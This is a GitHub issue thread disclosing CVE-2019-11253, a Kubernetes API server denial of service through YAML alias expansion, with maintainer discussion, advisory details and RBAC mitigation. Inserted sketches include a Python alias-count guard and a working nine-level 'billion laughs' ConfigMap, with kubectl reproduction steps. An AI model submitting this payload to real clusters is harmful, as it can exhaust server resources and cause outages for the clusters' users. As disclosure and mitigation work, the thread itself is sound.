CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack #83253
Comments
/sig cli
To update based on ideas from @liggitt and @bgeesaman: it's also possible to use this issue to cause a denial of service; see the steps to reproduce.
Just saw this -- we should stop accepting yaml server side. Or have a "simple yaml" variant that gets rid of references. Any real world usages of users sending yaml to the api server? Can we go JSON/proto only?
Nice find!
I don't think we can simply drop a supported format. Disabling alias/anchor expansion or bounding allocations seems more reasonable. I have a fix in progress that does the latter.
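The "bounding allocations" idea can be illustrated outside of Go. Below is a minimal sketch in Python using PyYAML (the function name `safe_load_bounded` and the cap value are my own, not from the actual fix): scanning tokens never expands aliases, so counting them stays linear in the input size, and a document with a suspicious number of aliases can be rejected before any expansion happens.

```python
import yaml  # PyYAML, used here only to illustrate the bounding idea


def safe_load_bounded(text, max_aliases=100):
    """Reject documents with too many aliases before expanding them.

    Token scanning is linear in the input size because aliases are not
    expanded at that stage; expansion only happens during construction.
    """
    aliases = sum(1 for tok in yaml.scan(text)
                  if isinstance(tok, yaml.AliasToken))
    if aliases > max_aliases:
        raise ValueError(
            f"refusing to parse: {aliases} aliases exceed cap of {max_aliases}")
    return yaml.safe_load(text)


# A tiny "laughs" document: each level references the previous one
# three times, so expansion cost grows exponentially with depth.
hostile = """
a: &a ["x", "x", "x"]
b: &b [*a, *a, *a]
c: &c [*b, *b, *b]
"""
```

The real go-yaml patch takes a different approach internally, but the effect is similar: the parser refuses to do unbounded work on a small input.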
Sounds like something that should be treated as a security issue (DoS) and have a CVE associated with it. That would help users understand whether or not they are vulnerable to it.
I did a PR on go-yaml a year ago to mitigate this issue in some of our server-side components: go-yaml/yaml#375. Hope it helps!
/assign @jktomer |
@roycaihw: GitHub didn't allow me to assign the following users: jktomer. Note that only kubernetes members, repo collaborators and people who have commented on this issue/PR can be assigned. Additionally, issues/PRs can only have 10 assignees at the same time. In response to this:
I'm not disagreeing, but: we could drop yaml, and communicate that through Accept headers in an unambiguous way. On the other hand, claiming to accept "yaml" but then dropping support for some features of yaml seems harder for a client to respond to automatically :/ Also note we have patch variants like… (I completely agree that almost no "legitimate" client is sending yaml with anchors, except maybe in a hypothetical CRD that is human-authored and contains lots of internal duplication (argo pipeline??). I personally have no problem with nuking yaml anchor support, just as we also don't support !!foo, etc.)
Yeah, it would be a fundamental patch to the yaml library, effective process-wide.
It could be worth noting that, following discussions with the maintainer and the Go security team, a patch has been made for go-yaml which looks to address this kind of attack: go-yaml/yaml@bb4e33b
To mitigate against malicious YAML (as described here: kubernetes/kubernetes#83253) we used a patched version of yaml.v2. There is now a fix upstream so we can leverage that. Signed-off-by: Christopher Crone <christopher.crone@docker.com>
/label official-cve-feed (Related to kubernetes/sig-security#1)
Make sure we're not vulnerable to CVE-2019-11253. See kubernetes/kubernetes#83253
CVE-2019-11253 is a denial-of-service vulnerability in the kube-apiserver: authorized users sending malicious YAML or JSON payloads can cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy.
Affected versions:
All four patch releases are now available.
Fixed in master by #83261
Mitigation:
Requests that are rejected by authorization do not trigger the vulnerability, so tightening authorization rules and/or access to the Kubernetes API server limits which users are able to trigger this vulnerability.
To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation or as additional protection for an upgraded cluster, save the attached file as rbac.yaml and run:
Note: this removes the ability for unauthenticated users to use kubectl auth can-i
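The attached rbac.yaml is not included in this scrape. As a hedged sketch of the kind of binding the v1.14+ defaults use (my reconstruction, not the advisory's actual file), the discovery-related ClusterRoleBindings grant access only to the system:authenticated group, dropping system:unauthenticated as a subject:

```yaml
# Sketch only — not the advisory's attached file. Assumes the v1.14+
# default, in which system:unauthenticated is no longer a subject of
# the discovery-related bindings.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:basic-user
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:basic-user
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:authenticated
```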
If you are running a version prior to v1.14.0:
=============
Original description follows:
Introduction
Posting this as an issue following a report to the security list, who suggested putting it here as it's already public in a Stack Overflow question here
What happened:
When creating a ConfigMap object that contains recursive references, excessive CPU usage can occur. This appears to be an instance of a "billion laughs" attack, which is well known as an XML parsing issue.
Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.
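The manifest itself was an attachment and isn't reproduced in this scrape. As a representative sketch (my own construction, not the reporter's file): nine anchor levels of nine references each make the final alias expand to 9^9, roughly 3.9 × 10^8 scalars, from well under a kilobyte of input.

```yaml
# Sketch of a "billion laughs" ConfigMap; representative, not the
# original attachment. Level i expands to 9**i scalars on parse.
apiVersion: v1
kind: ConfigMap
metadata:
  name: yaml-bomb
data: {}
a: &a ["web","web","web","web","web","web","web","web","web"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```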
What you expected to happen:
Ideally, a maximum entity size would be defined, or some limit placed on recursive references in YAML parsed by kubectl.
One note is that the original poster on Stack Overflow indicated that the resource consumption was in kube-apiserver, but both tests I did (1.16 client against a 1.15 kubeadm cluster, and 1.16 client against a 1.16 kubeadm cluster) showed the CPU usage client-side.
How to reproduce it (as minimally and precisely as possible):
Get the manifest above and apply it to a cluster as normal with kubectl create -f <manifest>. Use top or another CPU monitor to observe the quantity of CPU time used.
Anything else we need to know?:
Environment:
Kubernetes version (use kubectl version):
test 1 (Linux AMD64 client, kubeadm cluster running in kind)
test 2 (Linux AMD64 client, kubeadm cluster running in VMware Workstation)